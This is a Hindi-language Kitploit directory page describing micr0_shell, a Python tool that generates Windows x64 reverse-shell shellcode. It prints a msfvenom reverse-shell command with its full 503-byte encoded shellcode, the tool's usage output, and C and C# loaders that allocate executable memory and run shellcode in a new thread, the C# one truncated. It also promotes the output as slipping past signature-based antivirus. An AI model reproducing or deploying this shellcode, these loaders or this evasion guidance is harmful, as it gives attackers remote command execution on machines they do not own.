Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
micr0_shell — micr0shell एक Python स्क्रिप्ट है जो गतिशील रूप से Windows X64 PIC Null-Free रिवर्स शेल शेलकोड उत्पन्न करती है। | Kitploit
उपकरण/GitHubGitHub/senzee1984/micr0_shell
पेलोड जनरेशनशोषणशेलकोडशेलकोड जनरेशनपेलोड डेवलपमेंट
GitHubsenzee1984/micr0_shell

micr0_shell

micr0shell एक Python स्क्रिप्ट है जो गतिशील रूप से Windows X64 PIC Null-Free रिवर्स शेल शेलकोड उत्पन्न करती है।

रिपॉजिटरी देखें
22233195 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

micr0 shell

Micr0shell एक हल्का और कुशल Python स्क्रिप्ट है जो विंडोज़ X64 पोजीशन-इंडिपेंडेंट कोड (PIC) नल-फ्री रिवर्स शेल शेलकोड को गतिशील रूप से उत्पन्न करने के लिए डिज़ाइन किया गया है। चयनित विकल्पों के आधार पर, उत्पन्न शेलकोड msfvenom के तुलनीय शेलकोड से 27 बाइट्स तक छोटा हो सकता है, साथ ही 0x00 बाइट्स को शामिल करने से भी बचता है। इसके अतिरिक्त, क्योंकि MSF का शेलकोड व्यापक रूप से उपयोग किया जाता है और इसलिए हस्ताक्षर-आधारित पहचान विधियों द्वारा पहचाने जाने की अधिक संभावना है, micr0shell द्वारा उत्पन्न शेलकोड चोरी-छिपाने की एक अतिरिक्त परत प्रदान करता है।

└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.45 LPORT=443 -f csharp -v shellcode -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 503 (iteration=0)
x64/xor chosen with final size 503
Payload size: 503 bytes
Final size of csharp file: 2586 bytes
byte[] shellcode = new byte[503] {
0x48,0x31,0xc9,0x48,0x81,0xe9,0xc6,0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,
0xff,0xff,0x48,0xbb,0x2b,0x1e,0x7f,0x17,0x61,0x58,0xad,0xc4,0x48,0x31,0x58,
0x27,0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0xd7,0x56,0xfc,0xf3,0x91,0xb0,
0x6d,0xc4,0x2b,0x1e,0x3e,0x46,0x20,0x08,0xff,0x95,0x7d,0x56,0x4e,0xc5,0x04,
0x10,0x26,0x96,0x4b,0x56,0xf4,0x45,0x79,0x10,0x26,0x96,0x0b,0x56,0xf4,0x65,
0x31,0x10,0xa2,0x73,0x61,0x54,0x32,0x26,0xa8,0x10,0x9c,0x04,0x87,0x22,0x1e,
0x6b,0x63,0x74,0x8d,0x85,0xea,0xd7,0x72,0x56,0x60,0x99,0x4f,0x29,0x79,0x5f,
0x2e,0x5f,0xea,0x0a,0x8d,0x4f,0x69,0x22,0x37,0x16,0xb1,0xd3,0x2d,0x4c,0x2b,
0x1e,0x7f,0x5f,0xe4,0x98,0xd9,0xa3,0x63,0x1f,0xaf,0x47,0xea,0x10,0xb5,0x80,
0xa0,0x5e,0x5f,0x5e,0x60,0x88,0x4e,0x92,0x63,0xe1,0xb6,0x56,0xea,0x6c,0x25,
0x8c,0x2a,0xc8,0x32,0x26,0xa8,0x10,0x9c,0x04,0x87,0x5f,0xbe,0xde,0x6c,0x19,
0xac,0x05,0x13,0xfe,0x0a,0xe6,0x2d,0x5b,0xe1,0xe0,0x23,0x5b,0x46,0xc6,0x14,
0x80,0xf5,0x80,0xa0,0x5e,0x5b,0x5e,0x60,0x88,0xcb,0x85,0xa0,0x12,0x37,0x53,
0xea,0x18,0xb1,0x8d,0x2a,0xce,0x3e,0x9c,0x65,0xd0,0xe5,0xc5,0xfb,0x5f,0x27,
0x56,0x39,0x06,0xf4,0x9e,0x6a,0x46,0x3e,0x4e,0x20,0x02,0xe5,0x47,0xc7,0x3e,
0x3e,0x45,0x9e,0xb8,0xf5,0x85,0x72,0x44,0x37,0x9c,0x73,0xb1,0xfa,0x3b,0xd4,
0xe1,0x22,0x5e,0xdf,0x2f,0xde,0xf6,0x74,0x2d,0x4d,0x17,0x61,0x19,0xfb,0x8d,
0xa2,0xf8,0x37,0x96,0x8d,0xf8,0xac,0xc4,0x2b,0x57,0xf6,0xf2,0x28,0xe4,0xaf,
0xc4,0x2a,0xa5,0xbf,0xbf,0x60,0x75,0xec,0x90,0x62,0x97,0x9b,0x5b,0xe8,0xa9,
0xec,0x7e,0x67,0x69,0x59,0x10,0x9e,0x8d,0xe1,0x4d,0xc1,0x76,0x7e,0x16,0x61,
0x58,0xf4,0x85,0x91,0x37,0xff,0x7c,0x61,0xa7,0x78,0x94,0x7b,0x53,0x4e,0xde,
0x2c,0x69,0x6d,0x8c,0xd4,0xde,0x37,0x9e,0xa3,0x10,0x52,0x04,0x63,0x97,0xbe,
0x56,0xdb,0xb2,0xa2,0x1b,0xcb,0xe1,0xaa,0x5f,0xe8,0x9f,0xc7,0xd4,0x6a,0x46,
0x33,0x9e,0x83,0x10,0x24,0x3d,0x6a,0xa4,0xe6,0xb2,0x15,0x39,0x52,0x11,0x63,
0x9f,0xbb,0x57,0x63,0x58,0xad,0x8d,0x93,0x7d,0x12,0x73,0x61,0x58,0xad,0xc4,
0x2b,0x5f,0x2f,0x56,0x31,0x10,0x24,0x26,0x7c,0x49,0x28,0x5a,0x50,0x98,0xc7,
0xc9,0x72,0x5f,0x2f,0xf5,0x9d,0x3e,0x6a,0x80,0x0f,0x4a,0x7e,0x16,0x29,0xd5,
0xe9,0xe0,0x33,0xd8,0x7f,0x7f,0x29,0xd1,0x4b,0x92,0x7b,0x5f,0x2f,0x56,0x31,
0x19,0xfd,0x8d,0xd4,0xde,0x3e,0x47,0x28,0xa7,0x65,0x89,0xa2,0xdf,0x33,0x9e,
0xa0,0x19,0x17,0xbd,0xe7,0x21,0xf9,0xe8,0xb4,0x10,0x9c,0x16,0x63,0xe1,0xb5,
0x9c,0x6f,0x19,0x17,0xcc,0xac,0x03,0x1f,0xe8,0xb4,0xe3,0x5d,0x71,0x89,0x48,
0x3e,0xad,0xc7,0xcd,0x10,0x59,0xd4,0xcb,0x37,0x94,0xa5,0x70,0x91,0xc2,0x57,
0x14,0xff,0xec,0x81,0x2d,0xa8,0x7f,0x6c,0x0d,0x0d,0x78,0x0b,0x58,0xf4,0x85,
0xa2,0xc4,0x80,0xc2,0x61,0x58,0xad,0xc4 };

पृष्ठभूमि

मैंने x86 शेलकोड विकास में अपने कौशल Offensive Security Exploit Developer (OSED) पाठ्यक्रम के माध्यम से प्राप्त किए, जो मुझे विशेष रूप से आकर्षक लगा। पाठ्यक्रम से पहले, शेलकोड विकास मेरे लिए एक रहस्यमय क्षेत्र लगता था, लेकिन मुझे जल्दी ही एहसास हुआ कि यह विशिष्ट उद्देश्यों को प्राप्त करने के लिए कितना लचीलापन प्रदान करता है। यह पहचानते हुए कि x64 शेलकोडिंग आज के परिदृश्य में अधिक प्रासंगिक और व्यापक रूप से उपयोग की जाती है, मैंने इस गतिशील और सुविधाजनक विंडोज़ x64 रिवर्स शेल शेलकोड जनरेटर स्क्रिप्ट को विकसित करने के लिए अपने सीखे हुए कौशल को लागू किया है।

उपयोग कैसे करें

Keystone Engine स्थापित करें

Python स्क्रिप्ट में x64 असेंबली निर्देशों से शेलकोड उत्पन्न करने के लिए, keystone इंजन निर्भरता की आवश्यकता है। Keystone Engine स्थापित करने के लिए pip का उपयोग करें:

pip install keystone-engine

स्क्रिप्ट उपयोग

उपयोगकर्ताओं के पास विभिन्न पैरामीटर निर्दिष्ट करने का लचीलापन है: IP पता, लिसनिंग पोर्ट, चर नाम, शेलकोड प्रारूप (विकल्पों में C, CSharp, Python और PowerShell शामिल हैं), शेल प्रकार (PowerShell या CMD), उत्पन्न शेलकोड को फ़ाइल में सहेजना है या नहीं, और उत्पन्न शेलकोड को निष्पादित करना है या नहीं (True/False)।

└─# python3 micr0shell.py                                                                                                                         

███╗░░░███╗██╗░█████╗░██████╗░░█████╗░  ░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
████╗░████║██║██╔══██╗██╔══██╗██╔══██╗  ██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██╔████╔██║██║██║░░╚═╝██████╔╝██║░░██║  ╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║╚██╔╝██║██║██║░░██╗██╔══██╗██║░░██║  ░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
██║░╚═╝░██║██║╚█████╔╝██║░░██║╚█████╔╝  ██████╔╝██║░░██║███████╗███████╗███████╗
╚═╝░░░░░╚═╝╚═╝░╚════╝░╚═╝░░╚═╝░╚════╝░  ╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝

लेखक: Senzee
गिटहब रिपॉजिटरी: https://github.com/senzee1984/micr0_shell
विवरण: गतिशील रूप से PIC नल-फ्री रिवर्स शेल शेलकोड उत्पन्न करें
चेतावनी: दुर्लभ मामलों में (.255 और .0 सह-अस्तित्व), उत्पन्न शेलकोड में NULL बाइट्स हो सकते हैं, जैसे कि जब IP 192.168.0.255 हो


usage: micr0shell.py [-h] --ip IP [--port PORT] [--language LAN] [--variable VAR] [--type SHELL_TYPE] [--execution CODE_EXEC] [--save SAVE]
                     [--output OUTPUT]
micr0shell.py: error: the following arguments are required: --ip/-i

शेलकोड को अच्छी तरह से काम करने के लिए केवल IP पता निर्दिष्ट करना आवश्यक है। डिफ़ॉल्ट पोर्ट मान 443 है, डिफ़ॉल्ट चर नाम buf है, डिफ़ॉल्ट भाषा python है, और डिफ़ॉल्ट शेल प्रकार cmd.exe है।

उपयोगकर्ता इस Python स्क्रिप्ट में उत्पन्न शेलकोड को निष्पादित करना चुन सकते हैं, उत्पन्न शेलकोड को बाइनरी फ़ाइल में भी सहेजा जा सकता है। डिफ़ॉल्ट रूप से, उत्पन्न शेलकोड निष्पादित नहीं होता है और फ़ाइल में सहेजा नहीं जाता है।

सरल शेलकोड रनर

उत्पन्न शेलकोड का सुविधाजनक परीक्षण करने के लिए विभिन्न सामान्य भाषाओं में सरल शेलकोड लोडर नीचे प्रदान किए गए हैं।

हालाँकि, यदि आप चोरी-छिपाने की क्षमताओं का मूल्यांकन करने में रुचि रखते हैं, तो ध्यान रखें कि निम्नलिखित शेलकोड लोडर स्वयं पहचाने जा सकते हैं। अधिक उन्नत चोरी-छिपाने की तकनीकों के लिए, आप वैकल्पिक शेलकोड लोडर तलाश सकते हैं, जो इस README दस्तावेज़ के दायरे से बाहर हैं।

C

#include "windows.h"
#include "stdlib.h"

unsigned char shellcode[] = {
  0xfc, 0x48, 0x83, 0xe4, 0xf0......};  // SHELLCODE HERE

int main()
{
    int length = sizeof(shellcode);
    void* exec = VirtualAlloc(0, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    RtlMoveMemory(exec, shellcode, length);
    HANDLE th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
}

CSharp

using System;
using System.Runtime.InteropServices;

namespace runner
{
    public class runner
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
टूल डाउनलोड करें